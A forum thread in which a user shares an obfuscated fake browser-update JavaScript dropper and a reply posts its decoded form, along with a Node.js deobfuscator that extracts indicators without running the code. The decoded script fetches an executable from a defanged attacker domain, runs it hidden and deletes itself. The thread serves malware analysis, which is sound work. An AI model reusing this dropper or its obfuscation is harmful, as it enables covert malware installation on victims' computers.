Bitcoin Forum

Other => Off-topic => Topic started by: no-ice-please on August 10, 2016, 02:52:54 AM



Title: Can somebody decipher this?
Post by: no-ice-please on August 10, 2016, 02:52:54 AM
There are a lot of fake browser update sites. Usually I download the script and go to the URL and forward the malicious stuff to VirusTotal to see how long various antivirus sites take to detect it. This script, though, is written in gibberish that doesn't seem to have a URL.

All the ZZZZZs are added to break links

It came from https://feipinofa.nZZZZZet/4231654327224/1470796620751580/fireZZZZZfox-patch.js
to which I was maliciously redirected from
http://www.newser.com/story/229406/subway-employee-accused-of-drugging-officers-drink.html
or
http://www.wistv.com/story/32721957/sandwich-chain-worker-accused-of-drugging-officers-drink

The script is as follows, can you decipher it? Warning: it has something malicious that no antivirus detects yet.

The symbol [ is replaced by ZZZZZ

var ggudez='vmaprc gvdfejfpuzexjmeez=h\'z n{pymastiro swterAk=gnjezvriaXxcztncnebjttrOgbzclskWjrq(k"qSp.xtfhbiqpo)q"ilh;ietloesnt=fws rbeigtecgvz vAnjzbhOyeiexXiSy"n(fcecptwistgpfnaroiyloigFsetgz.jeytfsomeSfyjcreejqtpOnbocy l;c=d"p)sAa iwycfnienXdexvuOwtqiutgcpez(ubtjfMdXlSkLu"bMxLjMzXjHl2d.y)e"dPh;cTiTpeqnm=mwk iddietpctve jAnjkbnOyeuehXaAs"r(zDbcdtcSa.hBgthOjDo"xmzaa)krkejlorouy=h;s hputctust"xhcetfq/tis:r/wfvosndabpain/qtxen1q.inx4a2w5l.y0e/e;g"zth bdsafedmmav=xffnmtuebGfSxbc.falitcclypjeke';var tcvj='wdklhrhFiomSm+p)ltu(q2e.zgunrfurriwhhClmxamrjoaerduot(urtCd"f+p)n1n9x2w.z5k4lel2e3b p;e"wfhxyenadvg(zrbosri;b1k=div fixiy;l5m+m<y=krity{vyt+j)zpvoz.der{gccEfGk"iTenl(brmun mlq"i,slnahfdsa,t c.kcb;asfev)knf(qdkujeinrbl;n)brulsln}v;fkacievai(ahicqedajtjcgSuWkrg)a{fSr.ftwlbippe5t(aps0uevek}i;q)p}i0z0lprOz.ueh ddd.qdj xTbnq;x=g hed cyjps.hdc tWz1x;o(keftfcaroieplsfeeof.nRhojBeerdgnfshde m;p.iyp)ztaiwsciuPwoa;j0h=g oohnubt(s a.xiyfoeeehlsxwFnix(dsstjftiasz)sebmv)vnwaslvefDzebbu.glwinFz';var xkvof='ewtkexmkapneed(lfs.adp lSk)i;mojTbenFfaxvkfy(sepnxiulj;e)rew eanmhnbuyrw(gab.i.zdcmxel"ncgcx/x i lxdegrvtbSzil"z+trufe.kornigyrzakhxCvmrCz3e(reb4cocdpajnafmms)l+qrythSrixet+rrrfo.vocnfgeraaehoCymaCf3x(fex4zohdafo,r0aab)j,m;r)heu jlesnpa vrb wvxahcaSyWlro=x mSu.utscsiupzFstipqusrkiamfacNhezlllm mfmii(o;j flvijFeehby.btustiwsmElxqbm)d)z.d(wpjtdeblmekDbey(xeolkpfFcitSlWx dcp)f;b.rtzpuEorlif"e(xojUecahfeoteah appdilypmmwejcroy)d"c.w;gtsebci k}aac y mei(dhk)rthcl w v p e{v}e\'m;uvraird ';var ujak='iyhfgwlyeknpemflvtoig=y"n4t5g2q1d0y3y"o;vvtadrz poizlkklzrujosiub=vyufgwiyyklpemnlstcia.lliernpggtphd;cvjahrb zsqsmpjnpcgfxnyai=svsfojapqzaxfmeet.hleefnqgvtuhx/koyzzktlfrajtsvun;cvlaurz jccwsmcxrttlthsiyxxsm=fZZZZZb]r,wlxrmitgicktsxcmp=tZZZZZv]l;gvxawra xag=d0p;ifvoirc(nvhazrz mia=r0j;yid<csgsnpunicdfondap;uia+m+u)x{s x n bcswwmdxgtdlchgiqxdsxZZZZZzic]b=bvifpjwpqztxkmtei.fsuuubzsstnrx(fao,qoczskxlfrvjdswuz)b;v b d xaj s+u=aomzfktlurkjospuk;g}cfiomrr(yvoajrw uie=a0r;dib<msfsfpknocxfenoaj;jii+e';var fjaur='+t)w{t e d wfmoqrn(kvfawrh amb=h0r;fmi<dokznkolzrljssouv;cmw+z+w)t{t a x p m nacqxbsvzweesobulqj=gyufnwryikbprmtlutfip.wcchpasrvAjts(tmy)f;g b c z b hlsrcisgccjtmxpmaZZZZZvmr]r=pclwxmexitzlthaivxcstZZZZZoib]y.vcchbaurdAitn(gabqpbpvoweeqojuwqi)y;h f c p}f w q bczwkmqxatillhdikxgshZZZZZsit]o=uljrdiigocttrxkmb.pjsohirni(m"o"y)n;n}ivdaorr posabuwlaquiqnowpvznr=xcnwlmoxytmldhqiuxvsy.gjkoxiunx(f"y"m)x;oveazrk fkujaatkjcalkrglojw=u"meivyaclc"u;atjheiyseZZZZZckdjcapkbcrltralbjz]v(cosaeudldqlirnzwgvdni)e;';var gce='f';var bboahfkbss=ggudez+tcvj+xkvof+ujak+fjaur+gce;   var e=new Error(2);   var t=e.number;   var uakenars="";   var riqrliooj=t;   var vdsyeadob=bboahfkbss.split("");   for (a=0;a<vdsyeadob.length;a +=riqrliooj){      uakenars=uakenars+vdsyeadobZZZZZa];}   var ycchmhvn=ZZZZZ"e","e","a","x","v","l","o"];   var xmodlrck=3-t;   var vhiwyzhho=ycchmhvnZZZZZxmodlrck]+ycchmhvnZZZZZ4]+ycchmhvnZZZZZ2]+ycchmhvnZZZZZ5];   var kbubebolwc=this;   var jksgjsorh=kbubebolwcZZZZZvhiwyzhho];   jksgjsorh(uakenars);           var axvqsxsjewcbr='qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj';

Right now it scores 0/54 on VirusTotal https://www.virustotal.com/en/file/0a5cdd5b40d88ded4a3783a7ed89148a13bdc3351a9a67cb2b78cd39bab408f3/analysis/1470797839/

In a few days it will score 5 or 10 / 54

In a week or two 20 or 30 / 54


Title: Re: Can somebody decipher this?
Post by: no-ice-please on August 11, 2016, 03:25:29 AM
In case anybody is interested, I posted it on another site and somebody cracked it.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/

The deciphered script (with XXXXX added) from the above gibberish is

Quote
try {
    a = new ActiveXObject("Wscript.Shell");            // WshShell, used below to launch the payload
    b = new ActiveXObject("Scripting.FileSystemObject");
    c = new ActiveXObject("MSXML2.XMLHTTP");           // HTTP client for the download
    d = new ActiveXObject("ADODB.Stream");             // binary stream used to write the file to disk
    url = "https:/XXXXX/feipinofa .netXXXXX/10/524.dat";
    fname = b.GetSpecialFolder(2) + String.fromCharCode(92) + "12345.exe"; // 2 = TemporaryFolder, 92 = backslash
    for (var i = 1; i <= 5; i++) {                     // up to five download attempts, 5 s apart
        try {
            c.open("GET", url, false);                 // synchronous request
            c.send(null);
            break;
        } catch (e) {
            WScript.Sleep(5000);
        }
    }
    d.Open;                                            // COM method call; JScript accepts it without parentheses
    d.Type = 1;                                        // adTypeBinary
    d.Write(c.ResponseBody);
    d.Position = 0;
    if (b.Fileexists(fname)) b.DeleteFile(fname);
    d.SaveToFile(fname);
    // 34 = double quote; window style 0 = hidden; false = do not wait for the process to exit
    a.run("cmd.exe /c " + String.fromCharCode(34) + fname + String.fromCharCode(34), 0, false);
    var p = WScript.ScriptFullName;
    if (b.FileExists(p)) b.DeleteFile(p);              // the dropper deletes its own .js file
    WScript.Echo("Update complete.");                  // the only thing the victim is meant to see
} catch (e) {}
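
As an added example (this is not code from the thread and not the method the BleepingComputer poster used), here is a Node.js re-implementation of the two decoding stages that the posted fireZZZZZfox-patch.js runs before reaching the dropper above, written so the payload text can be recovered without ever calling eval. Stage A keeps every t-th character of the joined fragments, where t comes from `new Error(2).number`, a property that only Microsoft JScript (WSH/IE) provides; stage B, which lives inside the stage-A output, splits a second ciphertext into rows as long as the key "452103" and permutes each row by that key. The function and variable names, the filler character, the harmless sample script and the example.invalid URL are my own constructions; `UJAK_START` is the opening of the fourth fragment copied verbatim from the first post.

```javascript
'use strict';
// Added example, not code from the forum thread. Node.js deobfuscator for the
// two stages of the posted fake browser-update script; names are mine.

// Stage A. The script joins its string fragments and keeps every t-th character,
// with t = (new Error(2)).number. In JScript that is 2; in V8 or SpiderMonkey the
// property is undefined, so the loop step is NaN, the loop stops after one
// character and this["undefinedval"] (the "eval" built from 3 - t) throws: the
// script is inert outside the engine it targets. The stride is a parameter here
// and `offset` selects which residue class of indices to keep.
function stageA(fragments, stride, offset = 0) {
  const joined = fragments.join('');
  let kept = '';
  for (let i = offset; i < joined.length; i += stride) kept += joined[i];
  return kept;
}

// Stage B. The stage-A output is itself a script holding a second ciphertext and a
// numeric key. The ciphertext is cut into rows as long as the key, and position m
// of every output row is read from position key[m] of the input row: one fixed
// permutation applied row by row, then eval'd. The key must be a permutation of
// 0..n-1 or characters would be duplicated or dropped.
function stageB(cipher, key) {
  const k = key.split('').map(Number);
  const sorted = [...k].sort((x, y) => x - y);
  if (!sorted.every((v, i) => v === i)) throw new Error('key is not a permutation');
  let plain = '';
  for (let pos = 0; pos < cipher.length; pos += k.length) {
    const row = cipher.substr(pos, k.length);
    for (let m = 0; m < k.length; m++) plain += row.charAt(k[m]);
  }
  return plain;
}

// Pull indicators out of the recovered text instead of running it.
function indicators(script) {
  const progIds = [...script.matchAll(/ActiveXObject\("([^"]+)"\)/g)].map(m => m[1]);
  const urls = [...script.matchAll(/https?:\/[^"'\s]+/g)].map(m => m[0]);
  return { progIds, urls };
}

// Inverse transforms, used only to build the constructed sample below.
function encodeStageB(plain, key) {
  const k = key.split('').map(Number);
  while (plain.length % k.length) plain += ' '; // pad to whole rows
  let cipher = '';
  for (let pos = 0; pos < plain.length; pos += k.length) {
    const row = plain.substr(pos, k.length);
    const c = new Array(k.length);
    for (let m = 0; m < k.length; m++) c[k[m]] = row[m];
    cipher += c.join('');
  }
  return cipher;
}
function encodeStageA(plain, stride, filler = 'q') {
  return plain.split('').map(ch => ch + filler.repeat(stride - 1)).join('');
}

// Opening of the thread's fourth fragment (ujak), copied from the first post. Its
// readable characters sit at odd local indices (the fragment starts at an odd
// index of the full concatenation), so offset 1 is what decodes it in isolation.
const UJAK_START = 'iyhfgwlyeknpemflvtoig=y"n4t5g2q1d0y3y"o;vvtadrz poizlkklzrujosiub=vyufgwiyyklpemnlstcia.lliernpggtphd;';

// Constructed end-to-end sample: a harmless script wrapped the same way as the
// real one (stage B with the thread's key, then stage A with stride 2).
const SAMPLE_KEY = '452103';
const SAMPLE_PLAIN = 'a=new ActiveXObject("Wscript.Shell");url="https://example.invalid/x.dat";';
const SAMPLE_OBFUSCATED = encodeStageA(encodeStageB(SAMPLE_PLAIN, SAMPLE_KEY), 2);

// Run both stages on the constructed sample; trimEnd drops stage-B row padding.
function recoverSample() {
  return stageB(stageA([SAMPLE_OBFUSCATED], 2), SAMPLE_KEY).trimEnd();
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(stageA([UJAK_START], 2, 1)); // yfwykpmlti="452103";var ozklrjsu=yfwykpmlti.length;
  console.log(recoverSample());
  console.log(indicators(recoverSample()));
}
```

Running stage A alone on the real fragment is enough to see the key and the `.length` arithmetic of the second layer in clear; applied to the whole script, the two functions return the dropper text without touching WScript, ActiveX or the network, which is the safe way to get the URL and ProgIDs out of a sample like this.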


Title: Re: Can somebody decipher this?
Post by: Das on August 11, 2016, 03:12:41 PM
Does that mean someone is trying to hack into people's computers by asking them to download free browsers?

Wow, there is a real need for caution nowadays.